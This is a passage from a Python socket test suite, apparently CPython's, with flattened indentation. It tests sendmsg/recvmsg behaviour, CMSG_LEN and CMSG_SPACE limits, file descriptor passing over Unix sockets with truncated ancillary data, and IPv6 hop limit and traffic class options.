@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
